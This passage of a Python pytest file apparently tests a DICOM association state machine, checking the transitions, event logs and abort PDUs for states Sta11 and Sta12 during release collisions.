        ("Sta6", "Evt11", "AR-1"),
        ("Sta7", "Evt12", "AR-8"),
        ("Sta9", "Evt14", "AR-9"),
        ("Sta11", "Evt10", "AA-8"),
    ]
    assert self.fsm._transitions[:6] == [
        "Sta4",
        "Sta5",
        "Sta6",
        "Sta7",
        "Sta9",
        "Sta11",
    ]
    assert self.fsm._events[:7] == [
        "Evt1",
        "Evt2",
        "Evt3",
        "Evt11",
        "Evt12",
        "Evt14",
        "Evt10",
    ]
def test_evt11(self):
    """Test Sta11 + Evt11."""
    # Sta11 + Evt11 -> <ignore> -> Sta11
    # Evt11: Receive A-RELEASE (rq) primitive from <local user>
    commands = [
        ("recv", None),  # recv a-associate-rq
        ("send", a_associate_ac),
        ("recv", None),  # recv a-release-rq
        ("send", a_release_rq),  # collide
        ("recv", None),  # recv a-release-rp
        ("exit", None),
    ]
    self.scp = scp = self.start_server(commands)

    # Drive the requestor through the release collision into Sta11
    self.move_to_state(self.assoc, scp)
    # Trigger Evt11; ignored in Sta11, so no new (state, event, action) entry
    self.assoc.dul.send_pdu(self.get_release(False))
    scp.step()
    scp.step()
    scp.shutdown()

    assert self.fsm._changes[:6] == [
        ("Sta1", "Evt1", "AE-1"),
        ("Sta4", "Evt2", "AE-2"),
        ("Sta5", "Evt3", "AE-3"),
        ("Sta6", "Evt11", "AR-1"),
        ("Sta7", "Evt12", "AR-8"),
        ("Sta9", "Evt14", "AR-9"),
    ]
    assert self.fsm._transitions[:6] == [
        "Sta4",
        "Sta5",
        "Sta6",
        "Sta7",
        "Sta9",
        "Sta11",
    ]
    # The ignored event is still logged in the event history
    assert self.fsm._events[:7] == [
        "Evt1",
        "Evt2",
        "Evt3",
        "Evt11",
        "Evt12",
        "Evt14",
        "Evt11",
    ]
def test_evt12(self):
    """Test Sta11 + Evt12."""
    # Sta11 + Evt12 -> AA-8 -> Sta13
    # Evt12: Receive A-RELEASE-RQ PDU from <remote>
    # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
    commands = [
        ("recv", None),  # recv a-associate-rq
        ("send", a_associate_ac),
        ("recv", None),  # recv a-release-rq
        ("send", a_release_rq),  # collide
        ("recv", None),  # recv a-release-rp
        ("send", a_release_rq),  # trigger Evt12 while in Sta11
        ("recv", None),  # recv a-abort (AA-8)
        ("exit", None),
    ]
    self.scp = scp = self.start_server(commands)

    # Drive the requestor through the release collision into Sta11
    self.move_to_state(self.assoc, scp)
    scp.step()
    scp.step()
    scp.step()
    scp.step()
    scp.shutdown()

    assert self.fsm._changes[:7] == [
        ("Sta1", "Evt1", "AE-1"),
        ("Sta4", "Evt2", "AE-2"),
        ("Sta5", "Evt3", "AE-3"),
        ("Sta6", "Evt11", "AR-1"),
        ("Sta7", "Evt12", "AR-8"),
        ("Sta9", "Evt14", "AR-9"),
        ("Sta11", "Evt12", "AA-8"),
    ]
    assert self.fsm._transitions[:6] == [
        "Sta4",
        "Sta5",
        "Sta6",
        "Sta7",
        "Sta9",
        "Sta11",
    ]
    assert self.fsm._events[:7] == [
        "Evt1",
        "Evt2",
        "Evt3",
        "Evt11",
        "Evt12",
        "Evt14",
        "Evt12",
    ]
def test_evt13(self):
    """Test Sta11 + Evt13."""
    # Sta11 + Evt13 -> AR-3 -> Sta1
    # Evt13: Receive A-RELEASE-RP PDU from <remote>
    # AR-3: Issue A-RELEASE (rp) primitive and close connection
    commands = [
        ("recv", None),  # recv a-associate-rq
        ("send", a_associate_ac),
        ("recv", None),  # recv a-release-rq
        ("send", a_release_rq),  # collide
        ("recv", None),  # recv a-release-rp
        ("send", a_release_rp),  # trigger Evt13 while in Sta11
        ("exit", None),
    ]
    self.scp = scp = self.start_server(commands)

    # Drive the requestor through the release collision into Sta11
    self.move_to_state(self.assoc, scp)
    scp.step()
    scp.step()
    scp.step()
    scp.shutdown()

    # AR-3 completes the collision release and returns the FSM to idle
    assert self.fsm._changes[:7] == [
        ("Sta1", "Evt1", "AE-1"),
        ("Sta4", "Evt2", "AE-2"),
        ("Sta5", "Evt3", "AE-3"),
        ("Sta6", "Evt11", "AR-1"),
        ("Sta7", "Evt12", "AR-8"),
        ("Sta9", "Evt14", "AR-9"),
        ("Sta11", "Evt13", "AR-3"),
    ]
    assert self.fsm._transitions[:6] == [
        "Sta4",
        "Sta5",
        "Sta6",
        "Sta7",
        "Sta9",
        "Sta11",
    ]
    assert self.fsm._events[:7] == [
        "Evt1",
        "Evt2",
        "Evt3",
        "Evt11",
        "Evt12",
        "Evt14",
        "Evt13",
    ]
def test_evt14(self):
    """Test Sta11 + Evt14."""
    # Sta11 + Evt14 -> <ignore> -> Sta11
    # Evt14: Receive A-RELEASE (rsp) primitive from <local user>
    commands = [
        ("recv", None),  # recv a-associate-rq
        ("send", a_associate_ac),
        ("recv", None),  # recv a-release-rq
        ("send", a_release_rq),  # collide
        ("recv", None),  # recv a-release-rp
        ("exit", None),
    ]
    self.scp = scp = self.start_server(commands)

    # Drive the requestor through the release collision into Sta11
    self.move_to_state(self.assoc, scp)
    # Trigger Evt14; ignored in Sta11, so no new (state, event, action) entry
    self.assoc.dul.send_pdu(self.get_release(True))
    scp.step()
    scp.step()
    scp.shutdown()

    assert self.fsm._changes[:6] == [
        ("Sta1", "Evt1", "AE-1"),
        ("Sta4", "Evt2", "AE-2"),
        ("Sta5", "Evt3", "AE-3"),
        ("Sta6", "Evt11", "AR-1"),
        ("Sta7", "Evt12", "AR-8"),
        ("Sta9", "Evt14", "AR-9"),
    ]
    assert self.fsm._transitions[:6] == [
        "Sta4",
        "Sta5",
        "Sta6",
        "Sta7",
        "Sta9",
        "Sta11",
    ]
    # The ignored event is still logged in the event history
    assert self.fsm._events[:7] == [
        "Evt1",
        "Evt2",
        "Evt3",
        "Evt11",
        "Evt12",
        "Evt14",
        "Evt14",
    ]
def test_evt15(self):
    """Test Sta11 + Evt15."""
    # Sta11 + Evt15 -> AA-1 -> Sta13
    # Evt15: Receive A-ABORT (rq) primitive from <local user>
    # AA-1: Send A-ABORT PDU to <remote>, start ARTIM
    commands = [
        ("recv", None),  # recv a-associate-rq
        ("send", a_associate_ac),
        ("recv", None),  # recv a-release-rq
        ("send", a_release_rq),  # collide
        ("recv", None),  # recv a-release-rp
        ("recv", None),  # recv a-abort
        ("exit", None),
    ]
    self.scp = scp = self.start_server(commands)

    # Drive the requestor through the release collision into Sta11
    self.move_to_state(self.assoc, scp)
    # Local user aborts mid-collision -> AA-1 sends A-ABORT to the peer
    self.assoc.dul.send_pdu(self.get_abort())
    scp.step()
    scp.step()
    scp.step()
    scp.shutdown()

    assert self.fsm._changes[:7] == [
        ("Sta1", "Evt1", "AE-1"),
        ("Sta4", "Evt2", "AE-2"),
        ("Sta5", "Evt3", "AE-3"),
        ("Sta6", "Evt11", "AR-1"),
        ("Sta7", "Evt12", "AR-8"),
        ("Sta9", "Evt14", "AR-9"),
        ("Sta11", "Evt15", "AA-1"),
    ]
    assert self.fsm._transitions[:6] == [
        "Sta4",
        "Sta5",
        "Sta6",
        "Sta7",
        "Sta9",
        "Sta11",
    ]
    assert self.fsm._events[:7] == [
        "Evt1",
        "Evt2",
        "Evt3",
        "Evt11",
        "Evt12",
        "Evt14",
        "Evt15",
    ]
def test_evt16(self):
    """Test Sta11 + Evt16."""
    # Sta11 + Evt16 -> AA-3 -> Sta1
    # Evt16: Receive A-ABORT PDU from <remote>
    # AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
    commands = [
        ("recv", None),  # recv a-associate-rq
        ("send", a_associate_ac),
        ("recv", None),  # recv a-release-rq
        ("send", a_release_rq),  # collide
        ("recv", None),  # recv a-release-rp
        ("send", a_abort),  # trigger Evt16 while in Sta11
        ("exit", None),
    ]
    self.scp = scp = self.start_server(commands)

    # Drive the requestor through the release collision into Sta11
    self.move_to_state(self.assoc, scp)
    scp.step()
    scp.step()
    scp.step()
    scp.shutdown()

    assert self.fsm._changes[:7] == [
        ("Sta1", "Evt1", "AE-1"),
        ("Sta4", "Evt2", "AE-2"),
        ("Sta5", "Evt3", "AE-3"),
        ("Sta6", "Evt11", "AR-1"),
        ("Sta7", "Evt12", "AR-8"),
        ("Sta9", "Evt14", "AR-9"),
        ("Sta11", "Evt16", "AA-3"),
    ]
    assert self.fsm._transitions[:6] == [
        "Sta4",
        "Sta5",
        "Sta6",
        "Sta7",
        "Sta9",
        "Sta11",
    ]
    assert self.fsm._events[:7] == [
        "Evt1",
        "Evt2",
        "Evt3",
        "Evt11",
        "Evt12",
        "Evt14",
        "Evt16",
    ]
def test_evt17(self):
    """Test Sta11 + Evt17."""
    # Sta11 + Evt17 -> AA-4 -> Sta1
    # Evt17: Receive TRANSPORT_CLOSED from <transport service>
    # AA-4: Issue A-P-ABORT primitive
    commands = [
        ("recv", None),  # recv a-associate-rq
        ("send", a_associate_ac),
        ("recv", None),  # recv a-release-rq
        ("send", a_release_rq),  # collide
        ("recv", None),  # recv a-release-rp
        ("exit", None),
    ]
    self.scp = scp = self.start_server(commands)

    # Drive the requestor through the release collision into Sta11
    self.move_to_state(self.assoc, scp)
    scp.step()
    scp.step()
    # Shutting down the server closes the transport -> Evt17
    scp.shutdown()

    # Give the DUL reactor time to notice the closed transport
    # NOTE(review): timing-based wait; could be flaky on a slow machine
    time.sleep(0.5)

    assert self.fsm._changes[:7] == [
        ("Sta1", "Evt1", "AE-1"),
        ("Sta4", "Evt2", "AE-2"),
        ("Sta5", "Evt3", "AE-3"),
        ("Sta6", "Evt11", "AR-1"),
        ("Sta7", "Evt12", "AR-8"),
        ("Sta9", "Evt14", "AR-9"),
        ("Sta11", "Evt17", "AA-4"),
    ]
    assert self.fsm._transitions[:6] == [
        "Sta4",
        "Sta5",
        "Sta6",
        "Sta7",
        "Sta9",
        "Sta11",
    ]
    assert self.fsm._events[:7] == [
        "Evt1",
        "Evt2",
        "Evt3",
        "Evt11",
        "Evt12",
        "Evt14",
        "Evt17",
    ]
def test_evt18(self):
    """Test Sta11 + Evt18."""
    # Sta11 + Evt18 -> <ignore> -> Sta11
    # Evt18: ARTIM timer expired from <local service>
    commands = [
        ("recv", None),  # recv a-associate-rq
        ("send", a_associate_ac),
        ("recv", None),  # recv a-release-rq
        ("send", a_release_rq),  # collide
        ("recv", None),  # recv a-release-rp
        ("exit", None),
    ]
    self.scp = scp = self.start_server(commands)

    # Drive the requestor through the release collision into Sta11
    self.move_to_state(self.assoc, scp)
    # Force a fast ARTIM expiry to raise Evt18 while in Sta11
    self.assoc.dul.artim_timer.timeout = 0.05
    self.assoc.dul.artim_timer.start()
    # Wait long enough for the 0.05 s timer to fire and be processed
    time.sleep(0.5)
    scp.step()
    scp.step()
    scp.shutdown()

    assert self.fsm._changes[:6] == [
        ("Sta1", "Evt1", "AE-1"),
        ("Sta4", "Evt2", "AE-2"),
        ("Sta5", "Evt3", "AE-3"),
        ("Sta6", "Evt11", "AR-1"),
        ("Sta7", "Evt12", "AR-8"),
        ("Sta9", "Evt14", "AR-9"),
    ]
    assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
    # Evt18 is logged but produces no state change in Sta11
    assert self.fsm._events[:7] == [
        "Evt1",
        "Evt2",
        "Evt3",
        "Evt11",
        "Evt12",
        "Evt14",
        "Evt18",
    ]
def test_evt19(self):
    """Test Sta11 + Evt19."""
    # Sta11 + Evt19 -> AA-8 -> Sta13
    # Evt19: Received unrecognised or invalid PDU from <remote>
    # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
    commands = [
        ("recv", None),  # recv a-associate-rq
        ("send", a_associate_ac),
        ("recv", None),  # recv a-release-rq
        ("send", a_release_rq),  # collide
        ("recv", None),  # recv a-release-rp
        ("send", b"\x08\x00\x00\x00\x00\x00"),  # 0x08 isn't a valid PDU type
        ("recv", None),  # recv a-abort (AA-8)
        ("exit", None),
    ]
    self.scp = scp = self.start_server(commands)

    # Drive the requestor through the release collision into Sta11
    self.move_to_state(self.assoc, scp)
    scp.step()
    scp.step()
    scp.step()
    scp.step()
    scp.shutdown()

    assert self.fsm._changes[:7] == [
        ("Sta1", "Evt1", "AE-1"),
        ("Sta4", "Evt2", "AE-2"),
        ("Sta5", "Evt3", "AE-3"),
        ("Sta6", "Evt11", "AR-1"),
        ("Sta7", "Evt12", "AR-8"),
        ("Sta9", "Evt14", "AR-9"),
        ("Sta11", "Evt19", "AA-8"),
    ]
    assert self.fsm._transitions[:6] == [
        "Sta4",
        "Sta5",
        "Sta6",
        "Sta7",
        "Sta9",
        "Sta11",
    ]
    assert self.fsm._events[:7] == [
        "Evt1",
        "Evt2",
        "Evt3",
        "Evt11",
        "Evt12",
        "Evt14",
        "Evt19",
    ]
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState12(TestStateBase):
    """Tests for State 12: Release collision acc - awaiting A-RELEASE (rp)"""

    def move_to_state(self, assoc, scp):
        """Drive the acceptor-side FSM into Sta12 via a release collision.

        Path (see the per-test ``_changes`` asserts): Sta1 -> AE-5 -> Sta2
        -> AE-6 -> Sta3 -> AE-7 -> Sta6, local A-RELEASE (rq) -> AR-1 ->
        Sta7, remote A-RELEASE-RQ collides -> AR-8 -> Sta10, remote
        A-RELEASE-RP -> AR-10 -> Sta12.
        """

        def is_release_requested():
            """Override ACSE.is_release_requested."""
            # Prevent the ACSE from handling the collision itself so the
            # raw DUL state transitions can be observed
            return False

        assoc.acse.is_release_requested = is_release_requested

        assoc.start()
        scp.step()
        scp.step()
        self.wait_on_state(assoc.dul.state_machine, "Sta6")
        # Request release locally, then let the peer's colliding
        # A-RELEASE-RQ and A-RELEASE-RP move us through Sta10 to Sta12
        assoc.dul.send_pdu(self.get_release(False))
        scp.step()
        scp.step()
        self.wait_on_state(assoc.dul.state_machine, "Sta10")
        scp.step()
        self.wait_on_state(assoc.dul.state_machine, "Sta12")

    def test_evt01(self):
        """Test Sta12 + Evt1."""
        # Sta12 + Evt1 -> <ignore> -> Sta12
        # Evt1: A-ASSOCIATE (rq) primitive from <local user>
        commands = [
            ("send", a_associate_rq),
            ("recv", None),  # recv a-associate-rq
            ("recv", None),  # recv a-release-rq
            ("send", a_release_rq),  # collide
            ("send", a_release_rp),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)

        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        # Trigger Evt1; ignored in Sta12 so no new change is recorded
        assoc.dul.send_pdu(self.get_associate("request"))
        scp.step()
        scp.shutdown()

        assert fsm._transitions[:6] == [
            "Sta2",
            "Sta3",
            "Sta6",
            "Sta7",
            "Sta10",
            "Sta12",
        ]
        assert fsm._changes[:6] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta10", "Evt13", "AR-10"),
        ]
        assert fsm._events[:7] == [
            "Evt5",
            "Evt6",
            "Evt7",
            "Evt11",
            "Evt12",
            "Evt13",
            "Evt1",
        ]

    @pytest.mark.skip()
    def test_evt02(self):
        """Test Sta12 + Evt2."""
        # Sta12 + Evt2 -> <ignore> -> Sta12
        # Evt2: Receive TRANSPORT_OPEN from <transport service>
        # Skipped: presumably Evt2 cannot be generated against an
        # established association from this harness — TODO(review): confirm.
        pass

    def test_evt03(self):
        """Test Sta12 + Evt3."""
        # Sta12 + Evt3 -> AA-8 -> Sta13
        # Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("send", a_associate_rq),
            ("recv", None),  # recv a-associate-rq
            ("recv", None),  # recv a-release-rq
            ("send", a_release_rq),  # collide
            ("send", a_release_rp),
            ("send", a_associate_ac),  # trigger event
            ("recv", None),  # recv a-abort
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)

        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()

        assert fsm._transitions[:6] == [
            "Sta2",
            "Sta3",
            "Sta6",
            "Sta7",
            "Sta10",
            "Sta12",
        ]
        assert fsm._changes[:7] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta10", "Evt13", "AR-10"),
            ("Sta12", "Evt3", "AA-8"),
        ]
        assert fsm._events[:7] == [
            "Evt5",
            "Evt6",
            "Evt7",
            "Evt11",
            "Evt12",
            "Evt13",
            "Evt3",
        ]
        # AA-8's A-ABORT PDU: source 0x02, reason 0x00 (DUL provider abort)
        assert scp.handlers[0].received[2] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )

    def test_evt04(self):
        """Test Sta12 + Evt4."""
        # Sta12 + Evt4 -> AA-8 -> Sta13
        # Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("send", a_associate_rq),
            ("recv", None),  # recv a-associate-rq
            ("recv", None),  # recv a-release-rq
            ("send", a_release_rq),  # collide
            ("send", a_release_rp),
            ("send", a_associate_rj),  # trigger event
            ("recv", None),  # recv a-abort
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)

        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()

        assert fsm._transitions[:6] == [
            "Sta2",
            "Sta3",
            "Sta6",
            "Sta7",
            "Sta10",
            "Sta12",
        ]
        assert fsm._changes[:7] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta10", "Evt13", "AR-10"),
            ("Sta12", "Evt4", "AA-8"),
        ]
        assert fsm._events[:7] == [
            "Evt5",
            "Evt6",
            "Evt7",
            "Evt11",
            "Evt12",
            "Evt13",
            "Evt4",
        ]
        # AA-8's A-ABORT PDU: source 0x02, reason 0x00 (DUL provider abort)
        assert scp.handlers[0].received[2] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )

    @pytest.mark.skip()
    def test_evt05(self):
        """Test Sta12 + Evt5."""
        # Sta12 + Evt5 -> <ignore> -> Sta12
        # Evt5: Receive TRANSPORT_INDICATION from <transport service>
        # Skipped: presumably Evt5 cannot be generated against an
        # established association from this harness — TODO(review): confirm.
        pass

    def test_evt06(self):
        """Test Sta12 + Evt6."""
        # Sta12 + Evt6 -> AA-8 -> Sta13
        # Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("send", a_associate_rq),
            ("recv", None),  # recv a-associate-rq
            ("recv", None),  # recv a-release-rq
            ("send", a_release_rq),  # collide
            ("send", a_release_rp),
            ("send", a_associate_rq),  # trigger event
            ("recv", None),  # recv a-abort
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)

        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()

        assert fsm._transitions[:6] == [
            "Sta2",
            "Sta3",
            "Sta6",
            "Sta7",
            "Sta10",
            "Sta12",
        ]
        assert fsm._changes[:7] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta10", "Evt13", "AR-10"),
            ("Sta12", "Evt6", "AA-8"),
        ]
        assert fsm._events[:7] == [
            "Evt5",
            "Evt6",
            "Evt7",
            "Evt11",
            "Evt12",
            "Evt13",
            "Evt6",
        ]
        # AA-8's A-ABORT PDU: source 0x02, reason 0x00 (DUL provider abort)
        assert scp.handlers[0].received[2] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )

    def test_evt07(self):
        """Test Sta12 + Evt7."""
        # Sta12 + Evt7 -> <ignore> -> Sta12
        # Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
        commands = [
            ("send", a_associate_rq),
            ("recv", None),  # recv a-associate-ac
            ("recv", None),  # recv a-release-rq
            ("send", a_release_rq),  # collide
            ("send", a_release_rp),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)

        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        # Trigger Evt7; ignored in Sta12 so no new change is recorded
        assoc.dul.send_pdu(self.get_associate("accept"))
        scp.step()
        scp.shutdown()

        assert fsm._transitions[:6] == [
            "Sta2",
            "Sta3",
            "Sta6",
            "Sta7",
            "Sta10",
            "Sta12",
        ]
        assert fsm._changes[:6] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta10", "Evt13", "AR-10"),
        ]
        assert fsm._events[:7] == [
            "Evt5",
            "Evt6",
            "Evt7",
            "Evt11",
            "Evt12",
            "Evt13",
            "Evt7",
        ]

    def test_evt08(self):
        """Test Sta12 + Evt8."""
        # Sta12 + Evt8 -> <ignore> -> Sta12
        # Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
        commands = [
            ("send", a_associate_rq),
            ("recv", None),  # recv a-associate-rq
            ("recv", None),  # recv a-release-rq
            ("send", a_release_rq),  # collide
            ("send", a_release_rp),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)

        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        # Trigger Evt8; ignored in Sta12 so no new change is recorded
        assoc.dul.send_pdu(self.get_associate("reject"))
        scp.step()
        scp.shutdown()

        assert fsm._transitions[:6] == [
            "Sta2",
            "Sta3",
            "Sta6",
            "Sta7",
            "Sta10",
            "Sta12",
        ]
        assert fsm._changes[:6] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta10", "Evt13", "AR-10"),
        ]
        assert fsm._events[:7] == [
            "Evt5",
            "Evt6",
            "Evt7",
            "Evt11",
            "Evt12",
            "Evt13",
            "Evt8",
        ]

    def test_evt09(self):
        """Test Sta12 + Evt9."""
        # Sta12 + Evt9 -> <ignore> -> Sta12
        # Evt9: Receive P-DATA primitive from <local user>
        commands = [
            ("send", a_associate_rq),
            ("recv", None),  # recv a-associate-rq
            ("recv", None),  # recv a-release-rq
            ("send", a_release_rq),  # collide
            ("send", a_release_rp),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)

        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        # Trigger Evt9; ignored in Sta12 so no new change is recorded
        assoc.dul.send_pdu(self.get_pdata())
        scp.step()
        scp.shutdown()

        assert fsm._transitions[:6] == [
            "Sta2",
            "Sta3",
            "Sta6",
            "Sta7",
            "Sta10",
            "Sta12",
        ]
        assert fsm._changes[:6] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta10", "Evt13", "AR-10"),
        ]
        assert fsm._events[:7] == [
            "Evt5",
            "Evt6",
            "Evt7",
            "Evt11",
            "Evt12",
            "Evt13",
            "Evt9",
        ]

    def test_evt10(self):
        """Test Sta12 + Evt10."""
        # Sta12 + Evt10 -> AA-8 -> Sta13
        # Evt10: Receive P-DATA-TF PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("send", a_associate_rq),
            ("recv", None),  # recv a-associate-rq
            ("recv", None),  # recv a-release-rq
            ("send", a_release_rq),  # collide
            ("send", a_release_rp),
            ("send", p_data_tf),  # trigger event
            ("recv", None),  # recv a-abort
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)

        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()

        assert fsm._transitions[:6] == [
            "Sta2",
            "Sta3",
            "Sta6",
            "Sta7",
            "Sta10",
            "Sta12",
        ]
        assert fsm._changes[:7] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta10", "Evt13", "AR-10"),
            ("Sta12", "Evt10", "AA-8"),
        ]
        assert fsm._events[:7] == [
            "Evt5",
            "Evt6",
            "Evt7",
            "Evt11",
            "Evt12",
            "Evt13",
            "Evt10",
        ]
        # AA-8's A-ABORT PDU: source 0x02, reason 0x00 (DUL provider abort)
        assert scp.handlers[0].received[2] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )

    def test_evt11(self):
        """Test Sta12 + Evt11."""
        # Sta12 + Evt11 -> <ignore> -> Sta12
        # Evt11: Receive A-RELEASE (rq) primitive from <local user>
        commands = [
            ("send", a_associate_rq),
            ("recv", None),  # recv a-associate-rq
            ("recv", None),  # recv a-release-rq
            ("send", a_release_rq),  # collide
            ("send", a_release_rp),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)

        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        # Trigger Evt11; ignored in Sta12 so no new change is recorded
        assoc.dul.send_pdu(self.get_release(False))
        scp.step()
        scp.shutdown()

        assert fsm._transitions[:6] == [
            "Sta2",
            "Sta3",
            "Sta6",
            "Sta7",
            "Sta10",
            "Sta12",
        ]
        assert fsm._changes[:6] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta10", "Evt13", "AR-10"),
        ]
        assert fsm._events[:7] == [
            "Evt5",
            "Evt6",
            "Evt7",
            "Evt11",
            "Evt12",
            "Evt13",
            "Evt11",
        ]

    def test_evt12(self):
        """Test Sta12 + Evt12."""
        # Sta12 + Evt12 -> AA-8 -> Sta13
        # Evt12: Receive A-RELEASE-RQ PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("send", a_associate_rq),
            ("recv", None),  # recv a-associate-rq
            ("recv", None),  # recv a-release-rq
            ("send", a_release_rq),  # collide
            ("send", a_release_rp),
            ("send", a_release_rq),  # trigger event
            ("recv", None),  # recv a-abort
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)

        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()

        assert fsm._transitions[:6] == [
            "Sta2",
            "Sta3",
            "Sta6",
            "Sta7",
            "Sta10",
            "Sta12",
        ]
        assert fsm._changes[:7] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta10", "Evt13", "AR-10"),
            ("Sta12", "Evt12", "AA-8"),
        ]
        assert fsm._events[:7] == [
            "Evt5",
            "Evt6",
            "Evt7",
            "Evt11",
            "Evt12",
            "Evt13",
            "Evt12",
        ]
        # AA-8's A-ABORT PDU: source 0x02, reason 0x00 (DUL provider abort)
        assert scp.handlers[0].received[2] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )

    def test_evt13(self):
        """Test Sta12 + Evt13."""
        # Sta12 + Evt13 -> AA-8 -> Sta1
        # Evt13: Receive A-RELEASE-RP PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("send", a_associate_rq),
            ("recv", None),  # recv a-associate-rq
            ("recv", None),  # recv a-release-rq
            ("send", a_release_rq),  # collide
            ("send", a_release_rp),
            ("send", a_release_rp),  # trigger event
            ("recv", None),  # recv a-abort
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)

        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()

        assert fsm._transitions[:6] == [
            "Sta2",
            "Sta3",
            "Sta6",
            "Sta7",
            "Sta10",
            "Sta12",
        ]
        assert fsm._changes[:7] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta10", "Evt13", "AR-10"),
            ("Sta12", "Evt13", "AA-8"),
        ]
        assert fsm._events[:7] == [
            "Evt5",
            "Evt6",
            "Evt7",
            "Evt11",
            "Evt12",
            "Evt13",
            "Evt13",
        ]
        # AA-8's A-ABORT PDU: source 0x02, reason 0x00 (DUL provider abort)
        assert scp.handlers[0].received[2] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )

    def test_evt14(self):
        """Test Sta12 + Evt14."""
